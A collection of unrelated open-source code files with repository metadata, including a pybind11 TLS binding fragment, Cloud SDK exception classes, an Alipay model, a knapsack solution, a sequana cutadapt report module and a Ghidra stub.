            ":param cipherList: The openssl cipher-list, defaults to empty string which does not modify the default "
            "cipher list \n"
            "localCertFilePath and privateKeyFilePath can optionally be the same file, i.e. a PEM that contains both "
            "pieces of data.",
            py::arg("peerCertFilePath"),
            py::arg("localCertFilePath"),
            py::arg("privateKeyFilePath"),
            py::arg("maxVerifyDepth") = 0,
            py::arg("allowTLSv10") = false,
            py::arg("allowTLSv11") = false,
            py::arg("allowTLSv12") = false, // NOTE(review): docstring says "default true" -- verify intended default
            py::arg("cipherList") = ""
        )

        // Read/write attribute bindings mirroring the struct's fields.
        .def_readwrite(
            "peerCertFilePath",
            &asiopal::TLSConfig::peerCertFilePath,
            "Certificate file used to verify the peer or server. Can be CA file or a self-signed cert provided "
            "by other party."
        )
        .def_readwrite(
            "localCertFilePath",
            &asiopal::TLSConfig::localCertFilePath,
            "File that contains the certificate (or certificate chain) that will be presented to the remote side "
            "of the connection."
        )
        .def_readwrite(
            "privateKeyFilePath",
            &asiopal::TLSConfig::privateKeyFilePath,
            "File that contains the private key corresponding to the local certificate."
        )
        .def_readwrite(
            "maxVerifyDepth",
            &asiopal::TLSConfig::maxVerifyDepth,
            "Max verification depth (defaults to 0 - peer certificate only)."
        )
        .def_readwrite(
            "allowTLSv10",
            &asiopal::TLSConfig::allowTLSv10,
            "Allow TLS version 1.0 (default false)."
        )
        .def_readwrite(
            "allowTLSv11",
            &asiopal::TLSConfig::allowTLSv11,
            "Allow TLS version 1.1 (default false)."
        )
        .def_readwrite(
            "allowTLSv12",
            &asiopal::TLSConfig::allowTLSv12,
            "Allow TLS version 1.2 (default true)."
        )
        .def_readwrite(
            "cipherList",
            &asiopal::TLSConfig::cipherList,
            "Openssl format cipher list"
        );
}
#endif // PYDNP3_ASIOPAL
#endif
|
[
"[email protected]"
] | |
7a775527cc467edc8a9e6c6269de9ab5c023c3e2
|
23611933f0faba84fc82a1bc0a85d97cf45aba99
|
/google-cloud-sdk/.install/.backup/lib/googlecloudsdk/core/exceptions.py
|
f84acc69f0dc89dfaf69055e8503fad1847a0204
|
[
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] |
permissive
|
KaranToor/MA450
|
1f112d1caccebdc04702a77d5a6cee867c15f75c
|
c98b58aeb0994e011df960163541e9379ae7ea06
|
refs/heads/master
| 2021-06-21T06:17:42.585908 | 2020-12-24T00:36:28 | 2020-12-24T00:36:28 | 79,285,433 | 1 | 1 |
Apache-2.0
| 2020-12-24T00:38:09 | 2017-01-18T00:05:44 |
Python
|
UTF-8
|
Python
| false | false | 3,353 |
py
|
# Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Base exceptions for the Cloud SDK."""
import os
from googlecloudsdk.core.util import platforms
class _Error(Exception):
    """A base exception for all Cloud SDK errors.

    This exception should not be used directly.
    """
    # Root of the SDK exception hierarchy; raise subclasses of Error or
    # InternalError instead of this class.
    pass
class InternalError(_Error):
    """A base class for all non-recoverable internal errors."""
    # Counterpart to Error (below), which covers user-recoverable failures.
    pass
class Error(_Error):
    """A base exception for all user recoverable errors.

    Any exception extending this class is not printed with a stack trace in
    CLI mode; instead it is shown with a message telling the user how to
    correct the problem. All exceptions of this type must carry such a
    message.
    """

    def __init__(self, *args, **kwargs):
        """Initialize a core.Error.

        Args:
          *args: positional args for exceptions.
          **kwargs: keyword args for exceptions, plus:
            - exit_code: int, the desired exit code for the CLI (default 1).
        """
        exit_code = kwargs.get('exit_code', 1)
        super(Error, self).__init__(*args)
        self.exit_code = exit_code
class MultiError(Error):
    """Collection of Error instances reported as a single exception."""

    def __init__(self, errors):
        combined = ', '.join(map(str, errors))
        super(MultiError, self).__init__(combined)
class RequiresAdminRightsError(Error):
    """An exception for when you don't have permission to modify the SDK.

    This tells the user how to run their command with administrator rights so that
    they can perform the operation.
    """

    def __init__(self, sdk_root):
        # Base message; platform-specific elevation instructions are appended.
        message = (
            u'You cannot perform this action because you do not have permission '
            u'to modify the Google Cloud SDK installation directory [{root}].\n\n'
            .format(root=sdk_root))
        if (platforms.OperatingSystem.Current() ==
            platforms.OperatingSystem.WINDOWS):
            message += (
                'Click the Google Cloud SDK Shell icon and re-run the command in '
                'that window, or re-run the command with elevated privileges by '
                'right-clicking cmd.exe and selecting "Run as Administrator".')
        else:
            # Specify the full path because sudo often uses secure_path and won't
            # respect the user's $PATH settings.
            gcloud_path = os.path.join(sdk_root, 'bin', 'gcloud')
            message += (
                u'Re-run the command with sudo: sudo {0} ...'.format(gcloud_path))
        super(RequiresAdminRightsError, self).__init__(message)
class NetworkIssueError(Error):
    """An error to wrap a general network issue."""

    def __init__(self, message):
        details = (
            '{message}\n'
            'This may be due to network connectivity issues. Please check your '
            'network settings, and the status of the service you are trying to '
            'reach.'
        ).format(message=message)
        super(NetworkIssueError, self).__init__(details)
[
"[email protected]"
] | |
132d3a611c7577d20741d725a2e5be24f6cd955a
|
5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d
|
/alipay/aop/api/domain/AnttechBlockchainSignIndexCreateModel.py
|
b024cf20674b77a37b1eb383bfa79e53e90aa35b
|
[
"Apache-2.0"
] |
permissive
|
alipay/alipay-sdk-python-all
|
8bd20882852ffeb70a6e929038bf88ff1d1eff1c
|
1fad300587c9e7e099747305ba9077d4cd7afde9
|
refs/heads/master
| 2023-08-27T21:35:01.778771 | 2023-08-23T07:12:26 | 2023-08-23T07:12:26 | 133,338,689 | 247 | 70 |
Apache-2.0
| 2023-04-25T04:54:02 | 2018-05-14T09:40:54 |
Python
|
UTF-8
|
Python
| false | false | 6,540 |
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
# Field names shared by the accessor properties and the (de)serialisation
# helpers below. The order fixes the insertion order of the dict returned
# by to_alipay_dict().
_SIGN_INDEX_FIELDS = (
    'app_name', 'biz_corp', 'biz_from', 'biz_scene', 'biz_unique_key',
    'open_id', 'principal_id', 'principal_type', 'sign_version', 'tenant',
    'valid_end_date', 'valid_start_date',
)


def _plain_property(name):
    """Build a property exposing the private ``_<name>`` attribute."""
    attr = '_' + name

    def getter(self):
        return getattr(self, attr)

    def setter(self, value):
        setattr(self, attr, value)

    return property(getter, setter)


class AnttechBlockchainSignIndexCreateModel(object):
    """Request model for anttech.blockchain.sign.index.create (Alipay OpenAPI)."""

    def __init__(self):
        # Every field starts unset; only truthy fields are serialised.
        for field in _SIGN_INDEX_FIELDS:
            setattr(self, '_' + field, None)

    # One property per field, all with identical plain get/set behaviour.
    app_name = _plain_property('app_name')
    biz_corp = _plain_property('biz_corp')
    biz_from = _plain_property('biz_from')
    biz_scene = _plain_property('biz_scene')
    biz_unique_key = _plain_property('biz_unique_key')
    open_id = _plain_property('open_id')
    principal_id = _plain_property('principal_id')
    principal_type = _plain_property('principal_type')
    sign_version = _plain_property('sign_version')
    tenant = _plain_property('tenant')
    valid_end_date = _plain_property('valid_end_date')
    valid_start_date = _plain_property('valid_start_date')

    def to_alipay_dict(self):
        """Serialise the truthy fields to a plain dict.

        Values providing their own ``to_alipay_dict`` are serialised
        recursively, matching the convention of the generated SDK models.
        """
        params = dict()
        for field in _SIGN_INDEX_FIELDS:
            value = getattr(self, field)
            if not value:
                continue
            if hasattr(value, 'to_alipay_dict'):
                params[field] = value.to_alipay_dict()
            else:
                params[field] = value
        return params

    @staticmethod
    def from_alipay_dict(d):
        """Build a model from a dict; returns None for a falsy input."""
        if not d:
            return None
        o = AnttechBlockchainSignIndexCreateModel()
        for field in _SIGN_INDEX_FIELDS:
            if field in d:
                setattr(o, field, d[field])
        return o
|
[
"[email protected]"
] | |
9becd149112233943b28b41f338400549756c333
|
d3720c1848fb69a05121fcd378a12a6d1921f303
|
/4_LEETCODE/2_DP/背包问题/2_完全背包.py
|
35b58da0a6cc62245ebacf6c4ba97c14a70f2b33
|
[] |
no_license
|
fzingithub/SwordRefers2Offer
|
32a44e87c178bafc554108f1d1e479e18b0ee028
|
57f303aa6e76f7c5292fa60bffdfddcb4ff9ddfb
|
refs/heads/master
| 2023-04-08T09:35:02.082121 | 2023-03-28T00:06:00 | 2023-03-28T00:06:00 | 219,700,616 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,412 |
py
|
'''
Unbounded ("complete") knapsack.

f[i][j]: best total value using the first i item types in a knapsack of
capacity j.  f[0][0] = 0, answer = f[N][V].
Transition: f[i][j] = max(f[i-1][j], f[i-1][j - k*v[i]] + k*w[i]) over all
feasible repeat counts k (each item type may be taken any number of times).
'''
# Input: first line "N V" (item-type count, capacity), then N lines "v w".
N, V = map(int, input().split())
v = [0] * (N + 1)  # volumes, 1-indexed
w = [0] * (N + 1)  # values, 1-indexed
for i in range(1, N + 1):
    v[i], w[i] = map(int, input().split())
# print(N,V)
# print(v,w)

# Version 1 -- plain 2-D DP with explicit repeat count k (all zeros initially):
# f = [[0 for i in range(V+1)] for i in range(N+1)]
#
# for i in range(1, N + 1):
#     for j in range(V + 1):
#         f[i][j] = f[i - 1][j]
#         for k in range(1, j // v[i] + 1):
#             f[i][j] = max(f[i][j], f[i - 1][j - k * v[i]] + k * w[i])
#
# print(f[N][V])

# Version 2 -- rolling 1-D array, still enumerating k:
# f = [0 for i in range(V+1)]
#
# for i in range(1, N + 1):
#     for j in range(V, v[i]-1, -1):
#         for k in range(0, j // v[i] + 1):
#             f[j] = max(f[j], f[j - k * v[i]] + k * w[i])
#
# print(f[V])

# Version 3 (active) -- drop k entirely: iterating capacity FORWARD lets
# f[j - v[i]] already include copies of item i, which is exactly the
# unbounded-knapsack recurrence.
f = [0 for i in range(V+1)]  # f[j]: best value with capacity j (all zeros)

for i in range(1, N + 1):
    for j in range(v[i], V+1):
        f[j] = max(f[j], f[j-v[i]] + w[i])

print(f[V])
|
[
"[email protected]"
] | |
5e45adf16188acbf28a383b77c22d5cfe2685e61
|
0f0fa5a3086649a32ede3722ca14b598948f35e0
|
/setup.py
|
551e361538f8b43b270ed51115caee7d37d43ba1
|
[] |
no_license
|
marazmiki/django-mptt-admin
|
cf6b3648e3898233f99e2c2861f8254f61307e1a
|
125908b87066e957051f36fed6d60a3088f12cdb
|
refs/heads/master
| 2021-01-22T00:51:21.576551 | 2011-10-11T17:53:54 | 2011-10-11T17:53:54 | 2,557,013 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 889 |
py
|
#!/usr/bin/env python
"""Packaging script for ``mpttadmin``: a jsTree-based Django admin for MPTT models."""
from setuptools import setup, find_packages

setup(
    name = 'mpttadmin',
    version = '0.3.1',
    author = 'Mikhail Sakhno',
    author_email = '[email protected]',
    description = """jstree admin for mptt models""",
    license = "BSD",
    keywords = "django admin",
    platforms = "POSIX",
    url = 'http://code.tabed.org/mptt_admin',
    install_requires=['django'],  # sole runtime dependency
    # find_packages() deliberately bypassed: only the package itself is shipped.
    packages=['mpttadmin'],#find_packages(),
    # Bundle the jsTree javascript/theme assets alongside the Python code.
    package_data = { 'mpttadmin': [
        'media/js/*.js',
        'media/js/lib/*.js',
        'media/js/lib/plugins/*.js',
        'media/js/lib/themes/*/*',
    ]},
    include_package_data=True,
    classifiers=[
        "Framework :: Django",
        "Intended Audience :: Developers",
        "Intended Audience :: System Administrators",
        "Operating System :: OS Independent",
        "Topic :: Software Development"
    ],
)
|
[
"[email protected]"
] | |
4f9c8082760b3d5d3170e070cda411b8e7983824
|
d445cb91195bd60a695cb0ec2eefa5303c200443
|
/sequana/modules_report/cutadapt.py
|
4cbe41064cdb5c2ce6cb5bbc04da981cd980e385
|
[
"BSD-3-Clause"
] |
permissive
|
aditkashy/sequana
|
3606f28cebdd299f864ab2379c58f8133b7ff76c
|
3c9917368fb7c4de63dcd5416c874b682ee2b20d
|
refs/heads/master
| 2020-08-05T03:22:27.439165 | 2019-06-27T15:14:09 | 2019-06-27T15:14:09 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 19,713 |
py
|
# coding: utf-8
#
# This file is part of Sequana software
#
# Copyright (c) 2016 - Sequana Development Team
#
# File author(s):
# Thomas Cokelaer <[email protected]>
# Dimitri Desvillechabrol <[email protected]>,
# <[email protected]>
#
# Distributed under the terms of the 3-clause BSD license.
# The full license is in the LICENSE file, distributed with this software.
#
# website: https://github.com/sequana/sequana
# documentation: http://sequana.readthedocs.io
#
##############################################################################
"""Module to write coverage report"""
import os
import io
import json
from collections import Counter
from sequana.modules_report.base_module import SequanaBaseModule
from sequana.utils import config
from sequana.lazy import pandas as pd
from sequana.lazy import pylab
from sequana import logger
from sequana.utils.datatables_js import DataTable
class CutadaptModule(SequanaBaseModule):
    """ Write the HTML report of a cutadapt/atropos adapter-trimming run.

    The input is the cutadapt log file for one sample; if a file with the
    same name but a ``.json`` extension sits next to it, that file is
    parsed as an atropos JSON report instead.
    """
    def __init__(self, cutadapt_log, sample_name, output_filename=None):
        """
        :param cutadapt_log: path to the cutadapt log file (a sibling
            ``.json`` file, if present, switches parsing to atropos mode).
        :param sample_name: sample identifier used in the report.
        :param output_filename: target HTML file passed to ``create_html``.
        """
        super().__init__()
        # Expected input data is the cutadapt log file
        if os.path.exists(cutadapt_log) is False:
            logger.error("This file {} does not exist".format(cutadapt_log))
        self.input_filename = cutadapt_log
        self.sample_name = sample_name
        self.jinja = {}
        self.data = {}
        atropos_log = cutadapt_log.replace(".txt", ".json")
        if os.path.exists(atropos_log):
            self.input_mode = "atropos"
            self.read_data() # store the rawdata
            self.parse_atropos(atropos_log)
        else:
            self.input_mode = "cutadapt"
            self.read_data() # store the rawdata
            self.parse_cutadapt()
        self._data_histograms = self._get_histogram_data()
        self.create_report_content()
        self.create_html(output_filename)

    def create_report_content(self):
        """ Generate the sections list to fill the HTML report.
        """
        self.sections = list()

        self.add_summary_section()
        self.add_stat_section()
        self.add_adapters_section()
        self.add_histogram_section()
        self.add_log_section()

    def read_data(self):
        # Keep the whole raw log (shown verbatim in the "log" section) and
        # detect single-end vs paired-end from its wording.
        with open(self.input_filename, "r") as fin:
            self._rawdata = fin.read()
        if "Total read pairs processed" in self._rawdata:
            self.jinja['mode'] = "Paired-end"
            self.mode = "pe"
        else:
            self.jinja['mode'] = "Single-end"
            self.mode = "se"

    def _get_data_tobefound(self):
        # (jinja key, log line prefix) pairs scanned for by parse_cutadapt.
        tobefound = []
        if self.mode == 'se':
            tobefound.append(('total_reads', 'Total reads processed:'))
            tobefound.append(('reads_with_adapters', 'Reads with adapters:'))
            tobefound.append(('reads_with_adapters', 'Reads with adapter:'))
            tobefound.append(('reads_too_short', 'Reads that were too short:'))
            tobefound.append(('reads_kept', 'Reads written (passing filters):'))
        else:
            # ! spaces are probably important here below !
            tobefound.append(('paired_total_reads', 'Total read pairs processed:'))
            tobefound.append(('paired_reads1_with_adapters', ' Read 1 with adapter:'))
            tobefound.append(('paired_reads2_with_adapters', ' Read 2 with adapter:'))
            tobefound.append(('paired_reads_too_short', 'Pairs that were too short'))
            tobefound.append(('paired_reads_kept', 'Pairs written (passing filters):'))
        return tobefound

    def add_log_section(self):
        # Verbatim copy of the raw cutadapt/atropos log.
        self.sections.append({
            "name": "log",
            "anchor": "log",
            "content": "<pre>\n"+ self._rawdata + "</pre>\n"
        })

    def _get_stats(self):
        # Build the summary table from the jinja entries filled by parse_*.
        if self.mode == "pe":
            prefix = "paired_"
        else:
            prefix = ""
        df = pd.DataFrame({'Number of reads': [], 'percent': []})
        # NOTE(review): DataFrame.ix was deprecated in pandas 0.20 and removed
        # in 1.0; .loc is the modern equivalent -- confirm the pinned pandas.
        df.ix['Total paired reads'] = [
            self.jinja['%stotal_reads' % prefix],
            '(100%)']
        if self.mode == "pe":
            df.ix['Read1 with adapters'] = [
                self.jinja['%sreads1_with_adapters' % prefix],
                self.jinja['%sreads1_with_adapters_percent'% prefix]]
            df.ix['Read2 with adapters'] = [
                self.jinja['%sreads2_with_adapters' % prefix],
                self.jinja['%sreads2_with_adapters_percent'% prefix]]
        else:
            df.ix['Pairs with adapters'] = [
                self.jinja['%sreads_with_adapters' % prefix],
                self.jinja['%sreads_with_adapters_percent'% prefix]]
        df.ix['Pairs too short'] = [
            self.jinja['%sreads_too_short' % prefix],
            self.jinja['%sreads_too_short_percent'% prefix]]
        df.ix['Pairs kept'] = [
            self.jinja['%sreads_kept' % prefix],
            self.jinja['%sreads_kept_percent' % prefix]]
        if self.mode != "pe":
            # Single-end: relabel "paired"/"Pairs" wording to "Reads".
            df.index = [this.replace('paired', '').replace('Pairs', 'Reads') for this in df.index]
        return df

    def _get_stat_section(self):
        # Render the stats table as an interactive DataTable plus its JS glue.
        datatable = DataTable(self._get_stats(), "cutadapt", index=True)
        datatable.datatable.datatable_options = {
            'scrollX': '300px',
            'pageLength': 15,
            'scrollCollapse': 'true',
            'dom': 'rtpB',
            "paging": "false",
            'buttons': ['copy', 'csv']}
        js = datatable.create_javascript_function()
        html_tab = datatable.create_datatable(float_format='%.3g')
        #csv_link = self.create_link('link', self.filename)
        #vcf_link = self.create_link('here', 'test.vcf')
        html = "Reads statistics after trimming and adapter removal. The " +\
               "A, C, G, T, N columns report the percentage of each bases in " +\
               "the overall sequences"
        html += "<p>{} {}</p>".format(html_tab, js)
        return html

    def add_stat_section(self):
        self.sections.append({
            "name": "Stats",
            "anchor": "stats",
            "content": self._get_stat_section()
        })

    def add_adapters_section(self):
        # Create a Table with adapters
        df = pd.DataFrame()
        df = pd.DataFrame({'Length': [], 'Trimmed':[], 'Type':[], 'Sequence': [], })
        for count, adapter in enumerate(self.data['adapters']):
            name = adapter['name']
            info = adapter['info']
            # NOTE(review): DataFrame.ix was removed in pandas 1.0; .loc is
            # the modern equivalent.
            df.ix[name] = [info['Length'], info['Trimmed'],
                           info['Type'], info['Sequence']]
        df.columns = ['Length', 'Trimmed', 'Type', 'Sequence']
        # "Trimmed" arrives as e.g. "12 times." (see parse_* methods); strip
        # the suffix so the column can be sorted numerically.
        df['Trimmed'] = df.Trimmed.map(lambda x: int(x.replace("times.", "")))

        # df.to_json(self.sample_name + "/cutadapt/cutadapt_stats2.json")
        df.sort_values(by="Trimmed", ascending=False, inplace=True)

        datatable = DataTable(df, "adapters", index=True)
        datatable.datatable.datatable_options = {
            'scrollX': 'true',
            'pageLength': 15,
            'scrollCollapse': 'true',
            'dom': 'frtipB',
            'buttons': ['copy', 'csv']}
        js = datatable.create_javascript_function()
        html_tab = datatable.create_datatable(float_format='%.3g')
        self.jinja['adapters'] = ""
        self.sections.append({
            "name": "Adapters",
            "anchor": "adapters",
            "content": "<p>{} {}</p>".format(html_tab, js)
        })

    def add_summary_section(self):
        """ Data-type and command-line section.
        """
        #image = self.create_embedded_png(self.chromosome.plot_coverage,
        #    input_arg="filename")
        import textwrap
        command = "\n".join(textwrap.wrap(self.jinja['command'], 80))
        # NOTE(review): the wrapped value above is immediately overwritten, so
        # the command is shown unwrapped -- confirm which rendering is wanted.
        command = self.jinja['command']

        html = "<p>Data type: {} </p>".format(self.jinja["mode"])
        html += '<div style="textwidth:80%">Command: <pre>{}</pre></div>'.format(command)
        self.sections.append({
            "name": "Data and command used",
            "anchor": "cutadapt",
            "content": html
        })

    def add_histogram_section(self):
        """Show only histograms with at least 3 counts
        """
        histograms = self._data_histograms
        html = ""
        html += "<div>\n"

        # get keys and count; Sort by number of adapters removed.
        # TODO: could have reused the df
        adapter_names = list(histograms.keys())
        count = [histograms[k]['count'].sum() for k in adapter_names]
        df2 = pd.DataFrame({'key':adapter_names, "count": count})
        df2.sort_values(by="count", ascending=False, inplace=True)

        for count, key in zip(df2["count"], df2['key']):
            if len(histograms[key]) <= 3:
                continue
            def plotter(filename, key):
                # Rendered lazily by create_embedded_png; one plot per adapter.
                name = key.replace(" ", "_")
                pylab.ioff()
                histograms[key].plot(logy=False, lw=2, marker="o")
                pylab.title(name + "(%s)" % count)
                pylab.grid(True)
                pylab.savefig(filename)
                pylab.close() # need to close the figure otherwise warnings
            imagehtml = self.create_embedded_png(plotter, "filename",
                style='width:45%', key=key)
            html += imagehtml
        html += "</div>\n"
        self.jinja['cutadapt'] = html
        self.sections.append({
            "name": "Histogram",
            "anchor": "histogram",
            "content": "<p>Here are the most representative/significant adapters found in the data</p>"+ html
        })

    def parse_cutadapt(self):
        # Fill self.jinja with summary metrics and self.data['adapters'] with
        # the per-adapter information found in the cutadapt text log.
        d = {}
        # output
        tobefound = self._get_data_tobefound()
        adapters = []

        data = self._rawdata.splitlines()
        # some metadata to extract
        for this in tobefound:
            key, pattern = this
            found = [line for line in data if line.startswith(pattern)]
            if len(found) == 0:
                logger.warning("ReportCutadapt: %s (not found)" % pattern)
            elif len(found) == 1:
                text = found[0].split(":", 1)[1].strip()
                try:
                    # lines usually look like "<count> (<percent>)"
                    this, percent = text.split()
                    self.jinja[key] = this
                    self.jinja[key+'_percent'] = percent
                except:
                    self.jinja[key] = text
                    self.jinja[key+'_percent'] = "?"

        dd = {}
        positions = []
        executable = "cutadapt"
        for pos, this in enumerate(data):
            if "This is Atropos" in this:
                executable = "atropos"
            if "Command line parameters: " in this:
                cmd = this.split("Command line parameters: ")[1]
                self.jinja['command'] = executable + " " + cmd
            if this.startswith("=== ") and "Adapter" in this:
                # A new adapter section starts here.
                name = this.split("=== ")[1].split(" ===")[0].strip()
                dd['name'] = name
                continue
            if this.startswith('Sequence:'):
                # "Sequence: <seq>; Type: ...; Length: ...; Trimmed: ..."
                info = this.split("Sequence:", 1)[1].strip()
                info = info.split(";")
                dd['info'] = {
                    'Sequence': info[0].strip(),
                    'Type': info[1].split(':',1)[1].strip(),
                    'Length': info[2].split(':',1)[1].strip(),
                    'Trimmed': info[3].split(':',1)[1].strip()
                }
                adapters.append(dd.copy())
        self.data["adapters"] = adapters

    def _get_histogram_data(self):
        """In cutadapt logs, an adapter section contains
        an histogram of matches that starts with a header
        and ends with a blank line
        """
        header = 'length\tcount\texpect\tmax.err\terror counts\n'
        with open(self.input_filename, 'r') as fin:
            # not too large so let us read everything
            data = fin.readlines()

        scanning_histogram = False
        adapters = []
        current_hist = header
        dfs = {}

        # cutadapt -b mode ("variable 5'/3'") emits TWO histograms per
        # adapter; remember which mode we are in before scanning.
        if "variable 5'/3'" in "\n".join(data):
            cutadapt_mode = "b"
        else:
            cutadapt_mode = "other"

        for this in data:
            # while we have not found a new adapter histogram section,
            # we keep going
            # !! What about 5' / 3'
            if this.startswith("==="):
                if 'read: Adapter' in this:
                    # We keep read: Adapter because it may be the first
                    # or second read so to avoid confusion we keep the full
                    # name for now.
                    name = this.replace("First read: Adapter ", "R1_")
                    name = name.replace("Second read: Adapter ", "R2_")
                    name = name.strip().strip("===")
                    name = name.strip()
                elif "=== Adapter" in this:
                    name = this.split("=== ")[1].split(" ===")[0]
                    name = name.strip()
                else:
                    pass

            if scanning_histogram is False:
                if this == header:
                    # we found the beginning of an histogram
                    scanning_histogram = True
                else:
                    # we are somewhere in the log we do not care about
                    pass
            elif scanning_histogram is True and len(this.strip()) != 0:
                # accumulate the histogram data
                current_hist += this
            elif scanning_histogram is True and len(this.strip()) == 0:
                # we found the end of the histogram
                # Could be a 5'/3' case ? if so another histogram is
                # possible
                df = pd.read_csv(io.StringIO(current_hist), sep='\t')
                #reinitiate the variables
                if cutadapt_mode != "b":
                    dfs[name] = df.set_index("length")
                    current_hist = header
                    scanning_histogram = False
                else:
                    # there will be another histogram so keep scanning
                    current_hist = header
                    # If we have already found an histogram, this is
                    # therefore the second here.
                    if name in dfs:
                        if len(df):
                            dfs[name] = dfs[name].append(df.set_index("length"))
                        scanning_histogram = False
                        dfs[name] = dfs[name].reset_index().groupby("length").aggregate(sum)
                    else:
                        dfs[name] = df.set_index("length")
                        scanning_histogram = True
            else:
                pass
        return dfs

    def parse_atropos(self, filename):
        """Parse the atropos report (JSON format)"""
        data = json.load(open(filename, "r"))

        # Is it paired or single-ended ?
        if data['input']['input_names'][1] is None:
            # NOTE(review): "Singled-end" looks like a typo for "Single-end"
            # (read_data uses "Single-end"); fixing it would change the
            # rendered report text, so it is only flagged here.
            self.jinja['mode'] = "Singled-end"
            prefix = ""
            self.mode = "se"
        else:
            self.jinja['mode'] = "Paired-end"
            prefix = "paired_"
            self.mode = "pe"

        dfs = {}
        self.data['adapters'] = []
        data_adapters = data['trim']['modifiers']['AdapterCutter']['adapters']
        reads = [0] * len(data_adapters[0])
        adapters = list(data_adapters[0].keys())
        N = data["record_counts"]['0']
        try:
            # Read2 -- single-end data has no second entry, hence the probe.
            reads.extend( [1] * len(data_adapters[1]))
            adapters.extend(list(data_adapters[1].keys()))
        except:
            pass

        read_tag = {0: "First read: ", 1: "Second read: "}
        for read, name in zip(reads, adapters):
            data_adapter = data_adapters[read][name]
            type_ = data_adapter['where']['desc']
            sequence = data_adapter["sequence"]
            length = len(sequence)
            trimmed = data_adapter['total']
            max_error = data_adapter['max_error_rate']

            # this takes care of the A,B,G mode of cutadapt/atropos
            d = Counter()
            for this in ['lengths_front', 'lengths_back']:
                if this in data_adapter.keys():
                    d += Counter(data_adapter[this])
            # Rebuild the cutadapt-style histogram table: count / expect /
            # max err indexed by match length.
            count = pd.DataFrame(list(d.values()), list(d.keys()), columns=['count'])
            count = count.reset_index().astype(int).sort_values("index", ascending=True)
            count.set_index("index", inplace=True)
            count['max err'] = [int(round(x * max_error)) for x in count.index]
            count.reset_index(inplace=True)
            count.rename(columns={"index":"length"}, inplace=True)
            count['expect'] = 0.25 ** count['length'] * N
            count.set_index("length", inplace=True)
            count = count[["count", "expect", "max err"]]
            dfs["R{}_".format(read+1) + name] = count.copy()

            # Note that the following text must be kept as it is since
            # it is then parsed in other methods
            self.data['adapters'].append({"info": {
                "Length": length,
                "Sequence": sequence,
                "Trimmed": "{} times.".format(trimmed),
                "Type": type_}, "name": read_tag[read]+name})

        # Store the histograms
        self._data_histograms = dfs

        # aliases
        formatters = data['trim']['formatters']
        filters = data['trim']['filters']['too_short']
        cutter = data['trim']['modifiers']['AdapterCutter']

        def _format(value):
            # fraction -> "(xx.x%)" string, rounded to 3 decimals.
            return "({}%)".format(100 * int(round(value,3)*1000)/1000.)

        self.jinja['%stotal_reads' % prefix] = N
        self.jinja['%sreads1_with_adapters' % prefix] = \
            str(cutter["records_with_adapters"][0])
        self.jinja['%sreads1_with_adapters_percent'% prefix] = \
            _format(cutter["fraction_records_with_adapters"][0])

        # duplicated reads1 in reads for the single-end case
        # This should be cleaned but is required for now to be compatible
        # with the code used with cutadapt
        self.jinja['%sreads_with_adapters' % prefix] = \
            str(cutter["records_with_adapters"][0])
        self.jinja['%sreads_with_adapters_percent'% prefix] = \
            _format(cutter["fraction_records_with_adapters"][0])

        if self.mode == "pe":
            self.jinja['%sreads2_with_adapters' % prefix] = \
                cutter["records_with_adapters"][1]
            self.jinja['%sreads2_with_adapters_percent'% prefix] = \
                _format(cutter["fraction_records_with_adapters"][1])
        self.jinja['%sreads_too_short' % prefix] = filters["records_filtered"]
        self.jinja['%sreads_too_short_percent'% prefix] = \
            _format(filters["fraction_records_filtered"])
        self.jinja['%sreads_kept' % prefix] = formatters['records_written']
        self.jinja['%sreads_kept_percent' % prefix] = \
            _format(formatters['fraction_records_written'])

        self.jinja['command'] = "{} {} {}".format("atropos",
            data['options']['action'], " ".join(data['options']['orig_args']))
|
[
"[email protected]"
] | |
d784039fbf29070d60585c62c411d71fd3bbbec9
|
943dca755b940493a8452223cfe5daa2fb4908eb
|
/abc303/a.py
|
252013eff15c913bcc6984509b0f36ea3d48e9cc
|
[] |
no_license
|
ymsk-sky/atcoder
|
5e34556582763b7095a5f3a7bae18cbe5b2696b2
|
36d7841b70b521bee853cdd6d670f8e283d83e8d
|
refs/heads/master
| 2023-08-20T01:34:16.323870 | 2023-08-13T04:49:12 | 2023-08-13T04:49:12 | 254,348,518 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 256 |
py
|
n = int(input())  # common length of the two strings
s = input()
t = input()
# The strings are "similar" when at every position the characters are equal,
# or both are in {l, 1}, or both are in {o, 0} (look-alike characters).
for i in range(n):
    if s[i] == t[i]:
        continue
    if (s[i] in "l1") and (t[i] in "l1"):
        continue
    if (s[i] in "o0") and (t[i] in "o0"):
        continue
    # First mismatching position decides the answer; stop immediately.
    print("No")
    exit()
print("Yes")
|
[
"[email protected]"
] | |
31fe857b5336046fc4b93282f053a38847cfe0bf
|
786027545626c24486753351d6e19093b261cd7d
|
/ghidra9.2.1_pyi/ghidra/program/model/listing/Bookmark.pyi
|
daf5c68be46b4922037f73b7817afe92f2eb5835
|
[
"MIT"
] |
permissive
|
kohnakagawa/ghidra_scripts
|
51cede1874ef2b1fed901b802316449b4bf25661
|
5afed1234a7266c0624ec445133280993077c376
|
refs/heads/main
| 2023-03-25T08:25:16.842142 | 2021-03-18T13:31:40 | 2021-03-18T13:31:40 | 338,577,905 | 14 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,124 |
pyi
|
import ghidra.program.model.address
import ghidra.program.model.listing
import java.lang
class Bookmark(java.lang.Comparable, object):
    """
    Interface for bookmarks. Bookmarks are locations that are marked within the program so
    that they can be easily found.
    """
    # NOTE(review): auto-generated Ghidra (Jython 2) type stub: ``unicode``
    # and ``long`` are Jython builtins, and ``@overload`` is assumed to be
    # provided by the stub tooling (it is not imported in this file) --
    # confirm against the stub generator before changing.

    def compareTo(self, __a0: object) -> int: ...

    def equals(self, __a0: object) -> bool: ...

